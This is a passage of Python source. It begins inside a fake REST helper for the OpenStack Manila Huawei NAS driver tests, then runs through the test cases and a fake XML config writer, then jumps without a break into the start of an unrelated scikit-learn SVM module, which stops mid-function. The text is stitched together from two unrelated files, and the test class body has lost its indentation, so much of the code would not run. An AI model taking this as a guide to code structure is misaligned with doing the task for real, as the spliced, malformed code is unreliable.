                self.delete_flag = True
            # Snapshot creation / lookup / deletion.
            if url == "FSSNAPSHOT":
                data = """{"error":{"code":0},"data":{
                    "ID":"3"}}"""
                self.create_snapflag = True
            if url == "FSSNAPSHOT/4@share_snapshot_fake_snapshot_uuid":
                if self.snapshot_flag:
                    data = """{"error":{"code":0},"data":{"ID":"3"}}"""
                else:
                    data = '{"error":{"code":1073754118}}'
                self.delete_flag = True
            if url == "FSSNAPSHOT/3":
                data = """{"error":{"code":0}}"""
                self.delete_flag = True
            # Access-rule creation is delegated to the allow_access() fake.
            if url == "NFS_SHARE_AUTH_CLIENT":
                data, self.allow_ro_flag, self.allow_rw_flag = \
                    allow_access('NFS', method, data)
                self.allow_flag = True
            if url == "CIFS_SHARE_AUTH_CLIENT":
                data, self.allow_ro_flag, self.allow_rw_flag = \
                    allow_access('CIFS', method, data)
                self.allow_flag = True
            if url == "FSSNAPSHOT?TYPE=48&PARENTID=4"\
                      "&&sortby=TIMESTAMP,d&range=[0-2000]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"3",
                    "NAME":"share_snapshot_fake_snapshot_uuid"}]}"""
                self.delete_flag = True
            # Access-rule listings: the [0-100] pages hold non-matching
            # names, the [100-200] pages hold the entries tests look for.
            if url == "NFS_SHARE_AUTH_CLIENT?"\
                      "filter=PARENTID::1&range=[0-100]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"0",
                    "NAME":"100.112.0.1_fail"}]}"""
            if url == "CIFS_SHARE_AUTH_CLIENT?"\
                      "filter=PARENTID::2&range=[0-100]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"0",
                    "NAME":"user_name_fail"}]}"""
            if url == "NFS_SHARE_AUTH_CLIENT?"\
                      "filter=PARENTID::1&range=[100-200]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"5",
                    "NAME":"100.112.0.1"}]}"""
            if url == "CIFS_SHARE_AUTH_CLIENT?"\
                      "filter=PARENTID::2&range=[100-200]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"6",
                    "NAME":"user_name"}]}"""
            # Access-rule deletion.
            if url == "NFS_SHARE_AUTH_CLIENT/5"\
                    or url == "CIFS_SHARE_AUTH_CLIENT/6":
                data = """{"error":{"code":0}}"""
                self.deny_flag = True
            if url == "NFSHARE/count" or url == "CIFSHARE/count":
                data = """{"error":{"code":0},"data":{
                    "COUNT":"196"}}"""
            if url == "NFS_SHARE_AUTH_CLIENT/count?filter=PARENTID::1"\
                    or url == "CIFS_SHARE_AUTH_CLIENT/count?filter="\
                              "PARENTID::2":
                data = """{"error":{"code":0},"data":{
                    "COUNT":"196"}}"""
            # Service status: RUNNINGSTATUS "2" means running, "1" stopped.
            if url == "CIFSSERVICE":
                if self.service_status_flag:
                    data = """{"error":{"code":0},"data":{
                        "RUNNINGSTATUS":"2"}}"""
                else:
                    data = """{"error":{"code":0},"data":{
                        "RUNNINGSTATUS":"1"}}"""
            if url == "NFSSERVICE":
                if self.service_nfs_status_flag:
                    data = """{"error":{"code":0},
                        "data":{"RUNNINGSTATUS":"2",
                        "SUPPORTV3":"true",
                        "SUPPORTV4":"true"}}"""
                else:
                    data = """{"error":{"code":0},
                        "data":{"RUNNINGSTATUS":"1",
                        "SUPPORTV3":"true",
                        "SUPPORTV4":"true"}}"""
                self.setupserver_flag = True
            if url == "FILESYSTEM?range=[0-8191]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"4",
                    "NAME":"share_fake_uuid"}]}"""
            # Filesystem detail/extend/delete via the filesystem() fake.
            if url == "filesystem/4":
                data, self.extend_share_flag = filesystem(method, data,
                                                          self.fs_status_flag)
                self.delete_flag = True
        else:
            # test_normal == False: simulate a backend-wide failure.
            data = '{"error":{"code":31755596}}'
        res_json = jsonutils.loads(data)
        return res_json
class FakeHuaweiNasDriver(huawei_nas.HuaweiNasDriver):
    """Fake HuaweiNasDriver."""

    def __init__(self, *args, **kwargs):
        # Run the normal initialisation, then swap in the fake backend
        # connection so no real array is ever contacted.
        super(FakeHuaweiNasDriver, self).__init__(*args, **kwargs)
        self.plugin = FakeV3StorageConnection(self.configuration)
class FakeV3StorageConnection(connection.V3StorageConnection):
    """Fake V3StorageConnection."""

    def __init__(self, configuration):
        # Initialise the real connection logic, then replace the REST
        # helper with the canned-response fake.
        super(FakeV3StorageConnection, self).__init__(configuration)
        self.configuration = configuration
        self.helper = FakeHuaweiNasHelper(self.configuration)
@ddt.ddt
class HuaweiShareDriverTestCase(test.TestCase):
"""Tests GenericShareDriver."""
def setUp(self):
super(HuaweiShareDriverTestCase, self).setUp()
self._context = context.get_admin_context()
self.tmp_dir = tempfile.mkdtemp()
self.fake_conf_file = self.tmp_dir + '/manila_huawei_conf.xml'
self.addCleanup(shutil.rmtree, self.tmp_dir)
self.create_fake_conf_file(self.fake_conf_file)
self.addCleanup(os.remove, self.fake_conf_file)
def _safe_get(opt):
return getattr(self.configuration, opt)
self.configuration = mock.Mock(spec=conf.Configuration)
self.configuration.safe_get = mock.Mock(side_effect=_safe_get)
self.configuration.network_config_group = 'fake_network_config_group'
self.configuration.share_backend_name = 'fake_share_backend_name'
self.configuration.huawei_share_backend = 'V3'
self.configuration.manila_huawei_conf_file = self.fake_conf_file
self.configuration.driver_handles_share_servers = False
self._helper_fake = mock.Mock()
self.mock_object(huawei_nas.importutils, 'import_object',
mock.Mock(return_value=self._helper_fake))
self.mock_object(time, 'sleep', fake_sleep)
self.driver = FakeHuaweiNasDriver(configuration=self.configuration)
self.driver.plugin.helper.test_normal = True
self.share_nfs = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'NFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool',
}
self.share_proto_fail = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'proto_fail',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool',
}
self.share_cifs = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'CIFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool',
}
self.nfs_snapshot = {
'id': 'fake_snapshot_uuid',
'share_name': 'share_fake_uuid',
'share_id': 'fake_uuid',
'display_name': 'snapshot',
'name': 'fake_snapshot_name',
'share_size': 1,
'size': 1,
'share_proto': 'NFS',
}
self.cifs_snapshot = {
'id': 'fake_snapshot_uuid',
'share_name': 'share_fake_uuid',
'share_id': 'fake_uuid',
'display_name': 'snapshot',
'name': 'fake_snapshot_name',
'share_size': 1,
'size': 1,
'share_proto': 'CIFS',
}
self.security_service = {
'id': 'fake_id',
'domain': 'FAKE',
'server': 'fake_server',
'user': 'fake_user',
'password': 'fake_password',
}
self.access_ip = {
'access_type': 'ip',
'access_to': '100.112.0.1',
'access_level': 'rw',
}
self.access_user = {
'access_type': 'user',
'access_to': 'user_name',
'access_level': 'rw',
}
self.share_server = None
self.driver._licenses = ['fake']
self.network_info = {
'server_id': 'fake_server_id',
'cidr': '10.0.0.0/24',
'security_services': ['fake_ldap', 'fake_kerberos', 'fake_ad', ],
'segmentation_id': '1000',
'network_allocations': [
{'id': 'fake_na_id_1', 'ip_address': 'fake_ip_1', },
{'id': 'fake_na_id_2', 'ip_address': 'fake_ip_2', },
],
}
self.share_nfs_host_not_exist = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'NFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#',
}
self.share_nfs_storagepool_fail = {
'id': 'fake_uuid',
'project_id': 'fake_tenant_id',
'display_name': 'fake',
'name': 'share-fake-uuid',
'size': 1,
'share_proto': 'NFS',
'share_network_id': 'fake_net_id',
'share_server_id': 'fake-share-srv-id',
'host': 'fake_host@fake_backend#OpenStack_Pool2',
}
def test_conf_product_fail(self):
self.recreate_fake_conf_file(product_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.check_conf_file)
def test_conf_pool_node_fail(self):
self.recreate_fake_conf_file(pool_node_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.check_conf_file)
def test_conf_username_fail(self):
self.recreate_fake_conf_file(username_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.check_conf_file)
def test_conf_timeout_fail(self):
self.recreate_fake_conf_file(timeout_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
timeout = self.driver.plugin._get_timeout()
self.assertEqual(60, timeout)
def test_conf_wait_interval_fail(self):
self.recreate_fake_conf_file(wait_interval_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
wait_interval = self.driver.plugin._get_wait_interval()
self.assertEqual(3, wait_interval)
def test_get_backend_driver_fail(self):
test_fake_conf_file = None
self.driver.plugin.configuration.manila_huawei_conf_file = (
test_fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.get_backend_driver)
def test_get_backend_driver_fail_driver_none(self):
self.recreate_fake_conf_file(product_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.get_backend_driver)
def test_create_share_nfs_alloctype_fail(self):
self.recreate_fake_conf_file(alloctype_value='alloctype_fail')
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_create_share_storagepool_not_exist(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidHost,
self.driver.create_share,
self._context,
self.share_nfs_host_not_exist,
self.share_server)
def test_create_share_nfs_storagepool_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidHost,
self.driver.create_share,
self._context,
self.share_nfs_storagepool_fail,
self.share_server)
def test_create_share_nfs_no_data_fail(self):
self.driver.plugin.helper.create_share_data_flag = True
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_read_xml_fail(self):
test_fake_conf_file = None
self.driver.plugin.configuration.manila_huawei_conf_file = (
test_fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver.plugin.helper._read_xml)
def test_connect_fail(self):
self.driver.plugin.configuration = None
self.assertRaises(exception.InvalidInput,
self.driver.plugin.connect)
def test_login_success(self):
deviceid = self.driver.plugin.helper.login()
self.assertEqual("210235G7J20000000000", deviceid)
def test_check_for_setup_success(self):
self.driver.plugin.helper.login()
self.driver.check_for_setup_error()
def test_check_for_setup_service_down(self):
self.driver.plugin.helper.service_status_flag = False
self.driver.plugin.helper.login()
self.driver.check_for_setup_error()
def test_check_for_setup_nfs_down(self):
self.driver.plugin.helper.service_nfs_status_flag = False
self.driver.plugin.helper.login()
self.driver.check_for_setup_error()
def test_check_for_setup_service_false(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.check_for_setup_error)
def test_create_share_nfs_alloctype_thin_success(self):
self.recreate_fake_conf_file(alloctype_value='Thin')
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.driver.plugin.helper.login()
location = self.driver.create_share(self._context, self.share_nfs,
self.share_server)
self.assertEqual("100.115.10.68:/share_fake_uuid", location)
def test_extend_share_success(self):
self.driver.plugin.helper.extend_share_flag = False
self.driver.plugin.helper.login()
self.driver.extend_share(self.share_nfs, 4,
self.share_server)
self.assertTrue(self.driver.plugin.helper.extend_share_flag)
def test_extend_share_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.extend_share,
self.share_nfs,
4,
self.share_server)
def test_extend_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.assertRaises(exception.InvalidShareAccess,
self.driver.extend_share,
self.share_nfs,
4,
self.share_server)
def test_create_share_nfs_success(self):
self.driver.plugin.helper.login()
location = self.driver.create_share(self._context, self.share_nfs,
self.share_server)
self.assertEqual("100.115.10.68:/share_fake_uuid", location)
def test_create_share_cifs_success(self):
self.driver.plugin.helper.login()
location = self.driver.create_share(self._context, self.share_cifs,
self.share_server)
self.assertEqual("\\\\100.115.10.68\\share_fake_uuid", location)
def test_login_fail(self):
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.plugin.helper.login)
def test_create_share_nfs_fs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_create_share_nfs_status_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.fs_status_flag = False
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_create_share_cifs_fs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_cifs,
self.share_server)
def test_create_share_cifs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_share_flag = True
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_cifs,
self.share_server)
def test_create_share_nfs_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_share_flag = True
self.assertRaises(exception.InvalidShare,
self.driver.create_share,
self._context,
self.share_nfs,
self.share_server)
def test_delete_share_nfs_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.delete_share(self._context,
self.share_nfs, self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_check_snapshot_id_exist_fail(self):
snapshot_id = "4"
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.plugin.helper._check_snapshot_id_exist,
snapshot_id)
def test_delete_share_nfs_fail_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.plugin.helper.share_exist = False
self.driver.delete_share(self._context,
self.share_nfs, self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_delete_share_cifs_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.delete_share(self._context, self.share_cifs,
self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_get_network_allocations_number(self):
number = self.driver.get_network_allocations_number()
self.assertEqual(0, number)
def test_create_share_from_snapshot(self):
self.assertRaises(NotImplementedError,
self.driver.create_share_from_snapshot,
self._context, self.share_nfs, self.nfs_snapshot,
self.share_server)
def test_get_share_stats_refresh_pool_not_exist(self):
self.driver.plugin.helper.login()
self.recreate_fake_conf_file(pool_node_flag=False)
self.driver.plugin.configuration.manila_huawei_conf_file = (
self.fake_conf_file)
self.assertRaises(exception.InvalidInput,
self.driver._update_share_stats)
def test_get_share_stats_refresh(self):
self.driver.plugin.helper.login()
self.driver._update_share_stats()
expected = {}
expected["share_backend_name"] = "fake_share_backend_name"
expected["driver_handles_share_servers"] = False
expected["vendor_name"] = 'Huawei'
expected["driver_version"] = '1.0'
expected["storage_protocol"] = 'NFS_CIFS'
expected['reserved_percentage'] = 0
expected['total_capacity_gb'] = 0.0
expected['free_capacity_gb'] = 0.0
expected['QoS_support'] = False
expected["pools"] = []
pool = {}
pool.update(dict(
pool_name='OpenStack_Pool',
total_capacity_gb=2,
free_capacity_gb=1,
allocated_capacity_gb=1,
QoS_support=False,
reserved_percentage=0,
))
expected["pools"].append(pool)
self.assertEqual(expected, self.driver._stats)
def test_allow_access_proto_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidInput,
self.driver.allow_access,
self._context,
self.share_proto_fail,
self.access_ip,
self.share_server)
def test_allow_access_ip_rw_success(self):
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_rw_flag = False
self.driver.allow_access(self._context,
self.share_nfs,
self.access_ip,
self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_rw_flag)
def test_allow_access_ip_ro_success(self):
access_ro = {
'access_type': 'ip',
'access_to': '1.2.3.4',
'access_level': 'ro',
}
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_ro_flag = False
self.driver.allow_access(self._context,
self.share_nfs,
access_ro,
self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_ro_flag)
def test_allow_access_user_rw_success(self):
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_rw_flag = False
self.driver.allow_access(self._context, self.share_cifs,
self.access_user, self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_rw_flag)
def test_allow_access_user_ro_success(self):
access_ro = {
'access_type': 'user',
'access_to': 'user_name',
'access_level': 'ro',
}
self.driver.plugin.helper.login()
self.allow_flag = False
self.allow_ro_flag = False
self.driver.allow_access(self._context, self.share_cifs,
access_ro, self.share_server)
self.assertTrue(self.driver.plugin.helper.allow_flag)
self.assertTrue(self.driver.plugin.helper.allow_ro_flag)
def test_allow_access_level_fail(self):
access_fail = {
'access_type': 'user',
'access_to': 'user_name',
'access_level': 'fail',
}
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access,
self._context, self.share_cifs,
access_fail, self.share_server)
def test_get_share_client_type_fail(self):
share_proto = 'fake_proto'
self.assertRaises(exception.InvalidInput,
self.driver.plugin.helper._get_share_client_type,
share_proto)
@ddt.data("NFS", "CIFS")
def test_get_share_url_type(self, share_proto):
share_url_type = self.driver.plugin.helper._get_share_url_type(
share_proto)
self.assertEqual(share_proto + 'HARE', share_url_type)
def test_get_location_path_fail(self):
share_name = 'share-fake-uuid'
share_proto = 'fake_proto'
self.assertRaises(exception.InvalidShareAccess,
self.driver.plugin._get_location_path, share_name,
share_proto)
def test_allow_access_ip_proto_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access, self._context,
self.share_nfs, self.access_user, self.share_server)
def test_allow_access_user_proto_fail(self):
self.driver.plugin.helper.login()
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access, self._context,
self.share_cifs, self.access_ip, self.share_server)
def test_deny_access_ip_proto_fail(self):
self.driver.plugin.helper.login()
result = self.driver.deny_access(self._context, self.share_nfs,
self.access_user, self.share_server)
self.assertEqual(None, result)
def test_deny_access_user_proto_fail(self):
self.driver.plugin.helper.login()
result = self.driver.deny_access(self._context, self.share_cifs,
self.access_ip, self.share_server)
self.assertEqual(None, result)
def test_allow_access_ip_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.assertRaises(exception.InvalidShareAccess,
self.driver.allow_access, self._context,
self.share_nfs, self.access_ip, self.share_server)
def test_deny_access_ip_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.driver.deny_access(self._context, self.share_nfs,
self.access_ip, self.share_server)
def test_allow_access_ip_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.allow_access, self._context,
self.share_nfs, self.access_ip, self.share_server)
def test_allow_access_user_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.allow_access, self._context,
self.share_cifs, self.access_user, self.share_server)
def test_deny_access_ip_success(self):
self.driver.plugin.helper.login()
self.deny_flag = False
self.driver.deny_access(self._context, self.share_nfs,
self.access_ip, self.share_server)
self.assertTrue(self.driver.plugin.helper.deny_flag)
def test_deny_access_user_success(self):
self.driver.plugin.helper.login()
self.deny_flag = False
self.driver.deny_access(self._context, self.share_cifs,
self.access_user, self.share_server)
self.assertTrue(self.driver.plugin.helper.deny_flag)
def test_deny_access_ip_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.deny_access, self._context,
self.share_nfs, self.access_ip, self.share_server)
def test_deny_access_user_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.deny_access, self._context,
self.share_cifs, self.access_user, self.share_server)
def test_create_nfs_snapshot_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_snapflag = False
self.driver.create_snapshot(self._context, self.nfs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.create_snapflag)
def test_create_nfs_snapshot_share_not_exist(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.share_exist = False
self.assertRaises(exception.InvalidInput,
self.driver.create_snapshot, self._context,
self.nfs_snapshot, self.share_server)
def test_create_cifs_snapshot_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.create_snapflag = False
self.driver.create_snapshot(self._context, self.cifs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.create_snapflag)
def test_delete_snapshot_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.plugin.helper.snapshot_flag = True
self.driver.delete_snapshot(self._context, self.nfs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_delete_snapshot_not_exist_success(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.delete_flag = False
self.driver.plugin.helper.snapshot_flag = False
self.driver.delete_snapshot(self._context, self.nfs_snapshot,
self.share_server)
self.assertTrue(self.driver.plugin.helper.delete_flag)
def test_create_nfs_snapshot_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_snapshot, self._context,
self.nfs_snapshot, self.share_server)
def test_create_cifs_snapshot_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.create_snapshot, self._context,
self.cifs_snapshot, self.share_server)
def test_delete_nfs_snapshot_fail(self):
self.driver.plugin.helper.login()
self.driver.plugin.helper.test_normal = False
self.assertRaises(exception.InvalidShare,
self.driver.delete_snapshot, self._context,
self.nfs_snapshot, self.share_server)
def test_delete_cifs_snapshot_fail(self):
    """A backend error during CIFS snapshot deletion raises InvalidShare."""
    helper = self.driver.plugin.helper
    helper.login()
    helper.test_normal = False
    self.assertRaises(exception.InvalidShare,
                      self.driver.delete_snapshot, self._context,
                      self.cifs_snapshot, self.share_server)
def test_get_pool_success(self):
    """get_pool() resolves the pool name from the backend when the
    share's host field does not carry one."""
    self.driver.plugin.helper.login()
    resolved = self.driver.get_pool(self.share_nfs_host_not_exist)
    self.assertEqual('OpenStack_Pool', resolved)
def test_get_pool_fail(self):
    """get_pool() returns None when the share does not exist on the array.

    Uses assertIsNone (the unittest-recommended form) rather than
    assertEqual(None, ...).
    """
    self.driver.plugin.helper.login()
    self.driver.plugin.helper.share_exist = False
    pool_name = self.driver.get_pool(self.share_nfs_host_not_exist)
    self.assertIsNone(pool_name)
def test_multi_resturls_success(self):
    """With several REST URLs configured, creation succeeds via failover."""
    self.recreate_fake_conf_file(multi_url=True)
    conf = self.driver.plugin.configuration
    conf.manila_huawei_conf_file = self.fake_conf_file
    self.driver.plugin.helper.login()
    self.driver.plugin.helper.test_multi_url_flag = 2
    location = self.driver.create_share(self._context, self.share_nfs,
                                        self.share_server)
    self.assertEqual("100.115.10.68:/share_fake_uuid", location)
def test_multi_resturls_fail(self):
    """Share creation raises InvalidShare when every REST URL fails."""
    self.recreate_fake_conf_file(multi_url=True)
    conf = self.driver.plugin.configuration
    conf.manila_huawei_conf_file = self.fake_conf_file
    self.driver.plugin.helper.login()
    self.driver.plugin.helper.test_multi_url_flag = 1
    self.assertRaises(exception.InvalidShare,
                      self.driver.create_share,
                      self._context,
                      self.share_nfs,
                      self.share_server)
def create_fake_conf_file(self, fake_conf_file,
                          product_flag=True, username_flag=True,
                          pool_node_flag=True, timeout_flag=True,
                          wait_interval_flag=True,
                          alloctype_value='Thick',
                          multi_url=False):
    """Write a fake Huawei driver XML config file to *fake_conf_file*.

    Each ``*_flag`` argument toggles between a valid value and an
    invalid/empty one for the corresponding element so tests can probe
    the driver's config validation:

    :param product_flag: True -> Product 'V3', False -> 'V3_fail'.
    :param username_flag: True -> UserName 'admin', False -> empty.
    :param pool_node_flag: True -> a pool list (with blank entries),
        False -> empty StoragePool text.
    :param timeout_flag: True -> Timeout '0', False -> empty.
    :param wait_interval_flag: True -> WaitInterval '0', False -> empty.
    :param alloctype_value: text for the AllocType element.
    :param multi_url: True -> two semicolon-separated RestURL entries.
    """
    doc = xml.dom.minidom.Document()
    config = doc.createElement('Config')
    doc.appendChild(config)

    # <Storage> section: connection and credential settings.
    storage = doc.createElement('Storage')
    config.appendChild(storage)
    controllerip0 = doc.createElement('LogicalPortIP')
    controllerip0_text = doc.createTextNode('100.115.10.68')
    controllerip0.appendChild(controllerip0_text)
    storage.appendChild(controllerip0)

    if product_flag:
        product_text = doc.createTextNode('V3')
    else:
        product_text = doc.createTextNode('V3_fail')
    product = doc.createElement('Product')
    product.appendChild(product_text)
    storage.appendChild(product)

    if username_flag:
        username_text = doc.createTextNode('admin')
    else:
        username_text = doc.createTextNode('')
    username = doc.createElement('UserName')
    username.appendChild(username_text)
    storage.appendChild(username)

    userpassword = doc.createElement('UserPassword')
    userpassword_text = doc.createTextNode('Admin@storage')
    userpassword.appendChild(userpassword_text)
    storage.appendChild(userpassword)

    url = doc.createElement('RestURL')
    if multi_url:
        # Two URLs separated by ';' exercise the multi-URL failover path.
        url_text = doc.createTextNode('http://100.115.10.69:8082/'
                                      'deviceManager/rest/;'
                                      'http://100.115.10.70:8082/'
                                      'deviceManager/rest/')
    else:
        url_text = doc.createTextNode('http://100.115.10.69:8082/'
                                      'deviceManager/rest/')
    url.appendChild(url_text)
    storage.appendChild(url)

    # <Filesystem> section: pool, timeouts and allocation settings.
    lun = doc.createElement('Filesystem')
    config.appendChild(lun)

    storagepool = doc.createElement('StoragePool')
    if pool_node_flag:
        # Deliberately includes a blank entry to test list parsing.
        pool_text = doc.createTextNode('OpenStack_Pool;OpenStack_Pool2; ;')
    else:
        pool_text = doc.createTextNode('')
    storagepool.appendChild(pool_text)

    timeout = doc.createElement('Timeout')
    if timeout_flag:
        timeout_text = doc.createTextNode('0')
    else:
        timeout_text = doc.createTextNode('')
    timeout.appendChild(timeout_text)

    waitinterval = doc.createElement('WaitInterval')
    if wait_interval_flag:
        waitinterval_text = doc.createTextNode('0')
    else:
        waitinterval_text = doc.createTextNode('')
    waitinterval.appendChild(waitinterval_text)

    alloctype = doc.createElement('AllocType')
    alloctype_text = doc.createTextNode(alloctype_value)
    alloctype.appendChild(alloctype_text)

    lun.appendChild(timeout)
    lun.appendChild(alloctype)
    lun.appendChild(waitinterval)
    lun.appendChild(storagepool)

    prefetch = doc.createElement('Prefetch')
    prefetch.setAttribute('Type', '0')
    prefetch.setAttribute('Value', '0')
    lun.appendChild(prefetch)

    # Context manager guarantees the handle is closed even if the
    # serialization raises (the original leaked it on error).
    with open(fake_conf_file, 'w') as fakefile:
        fakefile.write(doc.toprettyxml(indent=''))
def recreate_fake_conf_file(self, product_flag=True, username_flag=True,
                            pool_node_flag=True, timeout_flag=True,
                            wait_interval_flag=True,
                            alloctype_value='Thick',
                            multi_url=False):
    """Regenerate the fake Huawei config file in a fresh temp directory.

    All flags are forwarded verbatim to create_fake_conf_file().  Both
    the file and its directory are registered with addCleanup; cleanups
    run LIFO, so the file is removed before its directory is deleted.
    """
    self.tmp_dir = tempfile.mkdtemp()
    # os.path.join instead of string concatenation keeps the path portable.
    self.fake_conf_file = os.path.join(self.tmp_dir,
                                       'manila_huawei_conf.xml')
    self.addCleanup(shutil.rmtree, self.tmp_dir)
    self.create_fake_conf_file(self.fake_conf_file, product_flag,
                               username_flag, pool_node_flag,
                               timeout_flag, wait_interval_flag,
                               alloctype_value, multi_url)
    self.addCleanup(os.remove, self.fake_conf_file)
|
|
from __future__ import print_function
import numpy as np
import scipy.sparse as sp
import warnings
from abc import ABCMeta, abstractmethod
from . import libsvm, liblinear
from . import libsvm_sparse
from ..base import BaseEstimator, ClassifierMixin, ChangedBehaviorWarning
from ..preprocessing import LabelEncoder
from ..multiclass import _ovr_decision_function
from ..utils import check_array, check_random_state, column_or_1d
from ..utils import ConvergenceWarning, compute_class_weight, deprecated
from ..utils.extmath import safe_sparse_dot
from ..utils.validation import check_is_fitted
from ..externals import six
LIBSVM_IMPL = ['c_svc', 'nu_svc', 'one_class', 'epsilon_svr', 'nu_svr']
def _one_vs_one_coef(dual_coef, n_support, support_vectors):
    """Generate primal coefficients from dual coefficients
    for the one-vs-one multi class LibSVM in the case
    of a linear kernel."""
    # Reconstruct the weight vector of every 1-vs-1 sub-classifier.
    # dual_coef has shape (n_classes - 1, n_SV); see the LibSVM docs for
    # the exact layout.
    n_classes = dual_coef.shape[0] + 1

    # Start/end offsets of each class' support vectors within
    # support_vectors.  (Preallocating the output would be awkward in
